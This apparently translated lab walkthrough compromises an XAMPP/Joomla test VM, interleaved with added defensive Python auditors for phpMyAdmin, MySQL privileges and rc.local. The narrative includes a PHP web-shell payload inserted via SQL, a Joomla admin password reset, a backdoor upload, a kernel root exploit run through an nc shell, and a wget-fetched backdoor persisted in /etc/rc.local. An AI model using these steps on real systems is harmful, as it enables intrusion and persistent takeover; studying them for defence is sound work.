Information Gathering
Take the target IP.
Service Enumeration
Scanning with nmap gives the following result:

```
Starting Nmap 5.51 ( http://nmap.org ) at 2011-07-14 10:25 WIT
Nmap scan report for 192.168.56.101
Host is up (0.0011s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql
MAC Address: 08:00:27:A5:0B:F5 (Cadmus Computer Systems)
```
Port 80 is open, so I try to open the web page of that system: the main page is a Joomla template. I then scan for directory names that probably exist on that system with DirBuster, and I find a folder named XAMPP.
Vulnerability Assessment
By default XAMPP is not secure in its configuration: if we try to access the phpMyAdmin page, no username and password are required to get in.
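The weakness described here is a configuration setting, so it can be verified from the file itself. The Python script below is an added example (not from the original post): it parses the server entries in phpMyAdmin's config.inc.php and reports the combination that produces a login-free console. The sample configuration text is constructed to resemble what XAMPP ships; the option names it checks (auth_type, user, password, AllowNoPassword) are real phpMyAdmin settings, and the parser is a simplification that only handles the one-setting-per-line form.

```python
"""Audit a phpMyAdmin config.inc.php for the XAMPP-style "no login" setup.

Added example, not code from the original post. The config text below is
constructed; the setting names are real phpMyAdmin options."""
import re

# Constructed sample resembling the phpMyAdmin configuration XAMPP ships with.
SAMPLE_CONFIG = r"""
<?php
$cfg['blowfish_secret'] = 'xampp';
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['Servers'][$i]['host'] = 'localhost';
"""

# Matches one $cfg['Servers'][$i]['<key>'] = <'string'|true|false>; line.
SETTING_RE = re.compile(
    r"""\$cfg\['Servers'\]\[\$i\]\['(?P<key>\w+)'\]\s*=\s*(?P<val>'[^']*'|true|false)\s*;"""
)


def parse_server_settings(text):
    """Return a dict of the $cfg['Servers'][$i][...] settings found in a config."""
    settings = {}
    for m in SETTING_RE.finditer(text):
        raw = m.group("val")
        if raw in ("true", "false"):
            settings[m.group("key")] = raw == "true"
        else:
            settings[m.group("key")] = raw.strip("'")
    return settings


def audit_phpmyadmin(text):
    """Return a list of findings; an empty list means none of the checked weaknesses."""
    s = parse_server_settings(text)
    findings = []
    if s.get("auth_type") == "config":
        findings.append("auth_type is 'config': credentials live in the file and nobody is prompted to log in")
        if s.get("password") == "":
            findings.append("stored password for user %r is empty" % s.get("user", "?"))
    if s.get("AllowNoPassword") is True:
        findings.append("AllowNoPassword is true: accounts with an empty MySQL password may log in")
    return findings


# Hardened variant: prompt for credentials (cookie auth) and refuse empty passwords.
HARDENED_CONFIG = SAMPLE_CONFIG.replace("'config'", "'cookie'").replace("= true;", "= false;")

if __name__ == "__main__":
    for name, cfg in (("shipped", SAMPLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_phpmyadmin(cfg) or ["no findings"])
```

Switching auth_type to 'cookie' and leaving AllowNoPassword false removes every finding, as the hardened variant in the block shows; the root account's empty MySQL password is a separate problem on the database side, which phpMyAdmin can only refuse to accept.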
Pentesting
Try to view phpMyAdmin in XAMPP at the address http://victim.com/phpmyadmin. By default I land on the phpMyAdmin main page without being asked for a username and password.
In phpMyAdmin there are several databases of this system. Now I create a new database named victim (create database victim;) and find the MySQL data directory with the SQL statement: SELECT @@datadir
Now I know the MySQL directory is /opt/lampp/var/mysql/ and the web root is /opt/lampp/htdocs/.
Now try to create a backdoor with SQL. The first step is to create a table:

```sql
create table inject(
stack text
) type=myisam;
```

and then insert a value into the table inject with:

```sql
insert into inject(stack)
values(
‘<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>’
);
```
But at this step there is a syntax error; this way does not work, and I do not know another syntax to create it, because I am still learning.
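Whether a trick like the table above can ever reach the web root depends on what the database account is allowed to do and where mysqld may write files. As an added example (not part of the original post), the Python below audits three things an administrator can pull from a MySQL session: the secure_file_priv variable, which accounts hold the FILE privilege on *.*, and which accounts have an empty password. The sample rows are constructed; the statements whose output they mirror (SHOW VARIABLES, SHOW GRANTS, the mysql.user table) are real. The web-root path passed in is the one the post found, /opt/lampp/htdocs/.

```python
"""Audit the MySQL-side conditions behind "database writes into the web root".

Added example, not from the original post. Sample data is constructed to
resemble a stock XAMPP instance; the inputs mirror SHOW VARIABLES,
SHOW GRANTS and SELECT user, host, password FROM mysql.user."""
import re

SAMPLE_VARIABLES = {"datadir": "/opt/lampp/var/mysql/", "secure_file_priv": ""}
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT FILE ON *.* TO 'pma'@'localhost'",
    "GRANT SELECT, INSERT ON `joomla`.* TO 'joomla'@'localhost'",
]
# (user, host, password-hash); an empty hash means no password is set.
SAMPLE_USERS = [
    ("root", "localhost", ""),
    ("pma", "localhost", ""),
    ("joomla", "localhost", "*CONSTRUCTED_HASH_PLACEHOLDER"),
]

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<who>'[^']*'@'[^']*')", re.IGNORECASE
)


def accounts_with_file_privilege(grants):
    """Accounts holding FILE globally, either directly or through ALL PRIVILEGES."""
    out = []
    for g in grants:
        m = GRANT_RE.match(g)
        if not m:
            continue
        tokens = {p.strip().upper() for p in m.group("privs").split(",")}
        if m.group("scope") == "*.*" and tokens & {"ALL", "ALL PRIVILEGES", "FILE"}:
            out.append(m.group("who"))
    return out


def passwordless_accounts(users):
    """Accounts whose stored password hash is empty."""
    return ["'%s'@'%s'" % (u, h) for u, h, pw in users if pw == ""]


def audit_mysql(variables, grants, users, web_root):
    """Return a list of findings; empty means none of the checked weaknesses."""
    findings = []
    sfp = variables.get("secure_file_priv", "")
    if sfp == "":
        findings.append("secure_file_priv is empty: file import/export statements may use any path mysqld can reach")
    elif sfp.upper() != "NULL" and web_root.startswith(sfp.rstrip("/") + "/"):
        # NULL disables server-side file import/export entirely on newer servers.
        findings.append("secure_file_priv (%s) contains the web root %s" % (sfp, web_root))
    for who in accounts_with_file_privilege(grants):
        findings.append("%s holds the FILE privilege" % who)
    for who in passwordless_accounts(users):
        findings.append("%s has an empty password" % who)
    return findings


if __name__ == "__main__":
    for f in audit_mysql(SAMPLE_VARIABLES, SAMPLE_GRANTS, SAMPLE_USERS, "/opt/lampp/htdocs/"):
        print("-", f)
```

The remaining control is outside the database: the OS user mysqld runs as should have no write access to the web root at all, so even an account with FILE cannot place anything the web server will execute.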
Now I look at Joomla's database. There are many tables here, but I only look at the jos_users table and show all of its rows with:

```sql
select * from jos_users;
```
There is a Joomla administrator account with the username admin. Now I change the password value, using the MD5 function to produce the new value.
After that, log in to the Joomla administrator with username admin and the password we just changed.
After logging in, download an upload module for Joomla from joomla.org, install that module and activate it on the Joomla page.
Now browse to the main Joomla page and try to upload a file (the backdoor).
OK, the upload succeeds with the report:

```
Done! The file has been saved as: upload/404.php
```

Now let's access our backdoor at the link http://victim/upload/backdoor.php
Find a directory with rwx-rwx-rwx access permissions; here my victim's joomla/upload folder has rwx-rwx-rwx.
In my backdoor there is the information: Linux ubuntu-desktop 2.6.32-14-generic, and I know that kernel is vulnerable.
Now I am searching for a root exploit for kernel 2.6.32.
I try the exploit from exploit-db with number "15285". I think that code is C, so I save it with the extension .c (15285.c).
Now compile it with the command: gcc -w 15285.c -o accessroot
and then upload it to our victim site.
From my backdoor there is a network menu; its function is to open a port (I will open port 5678).
After the port is open, from our terminal type nc 192.168.56.101 5678, and the result is:

```
/bin/sh: can't access tty; job control turned off
$ ls
404.php
rootaccess
$ ./rootaccess
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc08c8c2c
[+] Resolved default_security_ops to 0xc0773300
[+] Resolved cap_ptrace_traceme to 0xc02f3dc0
[+] Resolved commit_creds to 0xc016dcc0
[+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
whoami
su root
```
Now upload a system backdoor from the web backdoor, or type: wget http://link_of_download_backdoor_system. After that, add a line to /etc/rc.local that executes the backdoor, so the backdoor always runs when the system boots.
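Persistence through /etc/rc.local is exactly what a responder should look for on a host like this one. As an added example (not part of the post), the Python below reads an rc.local body and flags lines that download or connect out at boot, reference world-writable or web-served directories, or execute dot-files, and it compares the file against a known-good SHA-256. The sample rc.local is constructed, reusing the placeholder URL from the post; the path list in RISKY_PATH is an assumption to be extended with the host's own layout.

```python
"""Flag suspicious boot-time commands in /etc/rc.local and detect drift from
a known-good copy. Added example, not from the original post; the sample
file content and the path list are constructed."""
import hashlib
import re

SAMPLE_RC_LOCAL = """#!/bin/sh -e
# rc.local (constructed sample)
/usr/sbin/ethtool -s eth0 wol g
wget http://link_of_download_backdoor_system -O /tmp/.svc && chmod +x /tmp/.svc
/tmp/.svc &
exit 0
"""

FETCH_TOOLS = re.compile(r"\b(wget|curl|nc|netcat|ncat|ftp|tftp)\b")
# Assumed set of directories that are world-writable or served by the web server.
RISKY_PATH = re.compile(r"(^|\s)(/tmp/|/var/tmp/|/dev/shm/|/opt/lampp/htdocs/|/var/www/)\S*")
HIDDEN_EXEC = re.compile(r"(^|\s)/\S*/\.\S+")


def audit_rc_local(text):
    """Return (line_number, command, reasons) for each line that trips a rule."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and the shebang line
        if not line:
            continue
        reasons = []
        if FETCH_TOOLS.search(line):
            reasons.append("downloads or connects out at boot")
        if RISKY_PATH.search(line):
            reasons.append("references a world-writable or web-served path")
        if HIDDEN_EXEC.search(line):
            reasons.append("runs a dot-file")
        if reasons:
            findings.append((n, line, reasons))
    return findings


def sha256_of(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def rc_local_changed(text, baseline_sha256):
    """True if the file no longer matches the hash recorded at build time."""
    return sha256_of(text) != baseline_sha256


if __name__ == "__main__":
    for n, cmd, why in audit_rc_local(SAMPLE_RC_LOCAL):
        print("line %d: %s\n    %s" % (n, cmd, "; ".join(why)))
```

Recording the hash of rc.local (and of the other boot hooks: cron entries, init scripts, systemd units) when a host is built turns this into a cheap integrity check, and the rule-based scan explains what changed when the hash no longer matches.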